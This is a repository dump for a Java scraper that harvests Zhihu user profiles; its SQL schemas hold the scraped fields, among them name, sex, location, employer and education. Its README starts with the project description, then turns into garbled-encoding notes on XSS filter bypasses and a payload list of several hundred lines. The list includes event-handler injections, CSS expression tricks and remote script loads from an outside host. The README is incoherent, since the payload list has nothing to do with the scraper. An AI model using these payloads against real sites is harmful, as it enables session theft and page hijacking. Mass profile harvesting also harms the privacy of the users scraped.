├── .gitignore ├── README.md ├── ZhihuSpriderGitHub.rar ├── userurl.sql └── zhihuuser.sql /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled Object files, Static and Dynamic libs (Shared Objects) 2 | *.o 3 | *.a 4 | *.so 5 | 6 | # Folders 7 | _obj 8 | _test 9 | 10 | # Architecture specific extensions/prefixes 11 | *.[568vq] 12 | [568vq].out 13 | 14 | *.cgo1.go 15 | *.cgo2.c 16 | _cgo_defun.c 17 | _cgo_gotypes.go 18 | _cgo_export.* 19 | 20 | _testmain.go 21 | 22 | *.exe 23 | *.test 24 | *.prof 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JavaZhiHuSpider 2 | ### java知乎爬虫:爬取用户信息 已爬10w(理论能爬完所有关注了任意话题的用户信息) 3 | ### 没有使用框架,httpclient连接池+线程池+正则实现. 4 | 5 | ### 厚颜无耻的挂上博客[HacL](http://yhis.me)+求波星 :) 6 | 7 | 8 | ´úÂë¹ýÂË£º 9 | medium--> Ë«Ð´ÈÆ¹ý£ºript>alert(/xss/) 10 | ´óСд»ìÏýÈÆ¹ý£º 11 | high-->ͨ¹ýimg¡¢bodyµÈ±êÇ©µÄʼþ»òÕßiframeµÈ±êÇ©µÄsrc×¢Èë¶ñÒâµÄjs´úÂë: 12 | 13 | prompt(¡®qq¡¯) 14 | onmouseover=¡¯alert(xss)¡¯ 15 | onmouseover=¡¯prompt(qq)¡¯ 16 | 17 | >"'> 18 | >"'> 19 |
20 | 21 | "+alert('XSS')+" 22 | '> 23 | ='> 24 | 25 | 26 | alert('XSS') 27 | 28 | %0a%0a.jsp 29 | %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 30 | %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 31 | %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 32 | 33 | a.jsp/ 34 | "> 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | "";'>out 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 |
51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 |
59 |
60 |
61 | 62 | 63 | alert('XSS'); 64 | .XSS{background-image:url("javascript.:alert('XSS')");} 65 | BODY{background:url("javascript.:alert('XSS')")} 66 | 67 | getURL("javascript.:alert('XSS')") 68 | a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d); 69 | 70 | "> <" 71 | 72 | 74 | "SRC="http://xss.ha.ckers.org/a.js"> 75 | 76 | '"SRC="http://xss.ha.ckers.org/a.js"> 77 | PTSRC="http://xss.ha.ckers.org/a.js"> 78 | link 79 | javascript:alert(1); 80 | javascript:alert(2); 81 | javascript:alert(3); 82 | javascript:alert(4); 83 | javascript:alert(5); 84 | javascript:alert(6); 85 | javascript:alert(7); 86 | '`"><\x3Cscript>javascript:alert(8) 87 | '`"><\x00script>javascript:alert(9) 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | \x3Cscript>javascript:alert(75) 154 | '"`> 155 | 159 | 160 | --> --> 161 | --> 162 | --> 163 | --> 164 | `"'>

167 | test 168 | test 169 | test 170 | test 171 | test 172 | test 173 | test 174 | test 175 | test 176 | test 177 | test 178 | test 179 | test 180 | test 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | "'`>ABC
DEF 189 | "'`>ABC
DEF 190 | 191 | 192 | 193 | '`"><\x3Cscript>javascript:alert(115) 194 | '`"><\x00script>javascript:alert(116) 195 | "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)> 196 | "'`><\x00img src=xxx:x onerror=javascript:alert(118)> 197 | 198 | 199 | 200 | 201 | javascript:alert(123); 202 | javascript:alert(124); 203 | javascript:alert(125); 204 | javascript:alert(126); 205 | javascript:alert(127); 206 | javascript:alert(128); 207 | javascript:alert(129); 208 | ABC
DEF 209 | ABC
DEF 210 | ABC
DEF 211 | ABC
DEF 212 | ABC
DEF 213 | ABC
DEF 214 | ABC
DEF 215 | ABC
DEF 216 | ABC
DEF 217 | ABC
DEF 218 | ABC
DEF 219 | ABC
DEF 220 | ABC
DEF 221 | ABC
DEF 222 | ABC
DEF 223 | ABC
DEF 224 | ABC
DEF 225 | ABC
DEF 226 | ABC
DEF 227 | ABC
DEF 228 | ABC
DEF 229 | ABC
DEF 230 | ABC
DEF 231 | ABC
DEF 232 | ABC
DEF 233 | ABC
DEF 234 | ABC
DEF 235 | test 236 | test 237 | test 238 | test 239 | test 240 | test 241 | test 242 | test 243 | test 244 | test 245 | test 246 | test 247 | test 248 | test 249 | test 250 | test 251 | test 252 | test 253 | test 254 | test 255 | test 256 | test 257 | test 258 | test 259 | test 260 | test 261 | test 262 | test 263 | test 264 | test 265 | test 266 | test 267 | test 268 | test 269 | test 270 | test 271 | test 272 | test 273 | test 274 | test 275 | test 276 | test 277 | test 278 | test 279 | test 280 | test 281 | test 282 | test 283 | test 284 | test 285 | test 286 | test 287 | test 288 | test 289 | test 290 | test 291 | test 292 | `"'> 293 | `"'> 294 | `"'> 295 | `"'> 296 | `"'> 297 | `"'> 298 | `"'> 299 | `"'> 300 | `"'> 301 | `"'> 302 | "`'> 303 | "`'> 304 | "`'> 305 | "`'> 306 | "`'> 307 | "`'> 308 | "`'> 309 | "`'> 310 | "`'> 311 | "`'> 312 | "`'> 313 | "`'> 314 | "`'> 315 | "`'> 316 | "`'> 317 | "`'> 318 | "`'> 319 | "`'> 320 | "`'> 321 | "`'> 322 | "`'> 323 | "`'> 324 | "`'> 325 | "`'> 326 | "`'> 327 | "`'> 328 | "`'> 329 | "`'> 330 | "`'> 331 | "`'> 332 | "`'> 333 | "`'> 334 | "`'> 335 | "`'> 336 | "`'> 337 | "`'> 338 | "`'> 339 | "/> 340 | "/> 341 | "/> 342 | "/> 343 | "/> 344 | "/> 345 | "/> 346 | "/> 347 | "/> 348 | javascript:alert(270) 349 | javascript:alert(271) 350 | javascript:alert(272) 351 | javascript:alert(273) 352 | javascript:alert(274) 353 | javascript:alert(275) 354 | javascript:alert(276) 355 | `"'> 356 | `"'> 357 | `"'> 358 | `"'> 359 | `"'> 360 | `"'> 361 | `"'> 362 | 383 | 384 | alert(308)0 385 |
386 | 387 | 388 | 389 | 390 | "> 393 | "> 394 | "> 395 | "> 396 | 397 | <% foo> 398 |
399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | XXX 434 | 435 | 436 | 437 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>"> 438 | <!--[if]><script>javascript:alert(362)</script --> 439 | <!--[if<img src=x onerror=javascript:alert(363)//]> --> 440 | <object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object> 441 | <a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X 442 | <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style> 443 | <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d 444 | <style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style> 445 | <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a> 446 | <// style=x:expression\28javascript:alert(375)\29> 447 | <style>*{x:expression(javascript:alert(376))}</style> 448 | <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X 449 | <script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script> 450 | <script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script> 451 | <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script> 452 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script> 453 | <meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾ 454 | X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` > 455 | 392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䎒vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(392)>`> 456 | 393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(393)>> 457 | 395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a> 458 | <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a> 459 | <event-source src="%(event)s" onload="javascript:alert(399)"> 460 | <a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> 461 | <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img񡿹src=x:x񡿹onerror񡿹=javascript:alert(401)>"> 462 | <script>javascript:alert(405)</script> 463 | <IMG SRC="javascript:javascript:alert(406);"> 464 | <IMG SRC=javascript:javascript:alert(407)> 465 | <IMG SRC=`javascript:javascript:alert(408)`> 466 | <FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET> 467 | <BODY ONLOAD=javascript:alert(411)> 468 | <BODY ONLOAD=javascript:javascript:alert(412)> 469 | <IMG SRC="jav ascript:javascript:alert(413);"> 470 | <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)> 471 | <IMG SRC="javascript:javascript:alert(417)" 472 | <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);"> 473 | <IMG DYNSRC="javascript:javascript:alert(420)"> 474 | <IMG LOWSRC="javascript:javascript:alert(421)"> 475 | <BGSOUND SRC="javascript:javascript:alert(422);"> 476 | <BR SIZE="&{javascript:alert(423)}"> 477 | <LINK REL="stylesheet" HREF="javascript:javascript:alert(425);"> 478 | <STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS 479 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);"> 480 | <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);"> 481 | <IFRAME SRC="javascript:javascript:alert(432);"></IFRAME> 482 | <TABLE BACKGROUND="javascript:javascript:alert(433)"> 483 | <TABLE><TD BACKGROUND="javascript:javascript:alert(434)"> 484 | <DIV STYLE="background-image: url(javascript:javascript:alert(435))"> 485 | <DIV STYLE="width:expression(javascript:alert(436));"> 486 | <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))"> 487 | <XSS STYLE="xss:expression(javascript:alert(438))"> 488 | <STYLE TYPE="text/javascript">javascript:alert(439);</STYLE> 489 | <STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A> 490 | <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE> 491 | <!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]--> 492 | <BASE HREF="javascript:javascript:alert(443);//"> 493 | <OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT> 494 | <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> 495 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML> 496 | <form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X 497 | <body onscroll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> 498 | <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)"> 499 | <STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE> 500 | <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&> 501 | <SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT> 502 | <style onreadystatechange=javascript:javascript:alert(457);></style> 503 | <?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html> 504 | <embed code=javascript:javascript:alert(460);></embed> 505 | <frameset onload=javascript:javascript:alert(462)></frameset> 506 | <object onerror=javascript:javascript:alert(463)> 507 | <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml> 508 | <IMG SRC=&{javascript:alert(466);};> 509 | <a href="javAascript:javascript:alert(467)">test467</a> 510 | <a href="javaascript:javascript:alert(468)">test468</a> 511 | <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(470)&gt;>"> 512 | ';alert(471))//';alert(471))//"; 513 | alert(472))//";alert(472))//-- 514 | ></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT> 515 | <IMG SRC="javascript:alert(476);"> 516 | <IMG SRC=javascript:alert(477)> 517 | <IMG SRC=JaVaScRiPt:alert(478)> 518 | <IMG SRC=javascript:alert(479)> 519 | <IMG SRC=`javascript:alert(480)`> 520 | <a onmouseover="alert(481)">xxs link</a> 521 | <a onmouseover=alert(482)>xxs link</a> 522 | <IMG """><SCRIPT>alert(483)</SCRIPT>"> 523 | <IMG SRC=javascript:alert(484))> 524 | <IMG SRC=# onmouseover="alert(485)"> 525 | <IMG SRC= onmouseover="alert(486)"> 526 | <IMG onmouseover="alert(487)"> 527 | <IMG SRC="jav ascript:alert(491);"> 528 | <IMG SRC="jav ascript:alert(492);"> 529 | <IMG SRC="jav ascript:alert(493);"> 530 | <IMG SRC="jav ascript:alert(494);"> 531 | perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out 532 | <IMG SRC="  javascript:alert(496);"> 533 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)> 534 | <<SCRIPT>alert(500);//<</SCRIPT> 535 | <IMG SRC="javascript:alert(503)" 536 | \";alert(505);// 537 | 538 | 539 | 540 | 541 | 542 |
562 |
563 |
564 |
565 |
566 | 567 | alert(549)'); ?> 568 | 569 | +ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4- 570 | /*%00*/alert(577)/*%00*/ 573 | 574 |
659 | < 660 | <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//-->">'> 661 | ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 663 | -------------------------------------------------------------------------------- /ZhihuSpriderGitHub.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhisme/JavaZhiHuSpider/c0d8503caf6bef33a1cc0718225a744783afc097/ZhihuSpriderGitHub.rar -------------------------------------------------------------------------------- /userurl.sql: -------------------------------------------------------------------------------- 1 | 2 | CREATE TABLE `userurl` ( 3 | `url` varchar(20) NOT NULL, 4 | PRIMARY KEY (`url`) 5 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4; 6 | -------------------------------------------------------------------------------- /zhihuuser.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `zhihuuser` ( 2 | `name` varchar(30) DEFAULT NULL, 3 | `sex` varchar(5) DEFAULT NULL, 4 | `location` varchar(30) DEFAULT NULL, 5 | `bussiness` varchar(30) DEFAULT NULL, 6 | `employment` varchar(30) DEFAULT NULL, 7 | `postion` varchar(30) DEFAULT NULL, 8 | `education` varchar(30) DEFAULT NULL, 9 | `education_extra` varchar(30) DEFAULT NULL, 10 | `suppose` int(11) DEFAULT NULL, 11 | `thanks` int(11) DEFAULT NULL, 12 | `question` int(11) DEFAULT NULL, 13 | `answer` int(11) DEFAULT NULL, 14 | `article` int(11) DEFAULT NULL, 15 | `followers` int(11) DEFAULT NULL, 16 | `following` int(11) DEFAULT NULL, 17 | `bewatched` int(11) DEFAULT NULL 18 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4; 19 | --------------------------------------------------------------------------------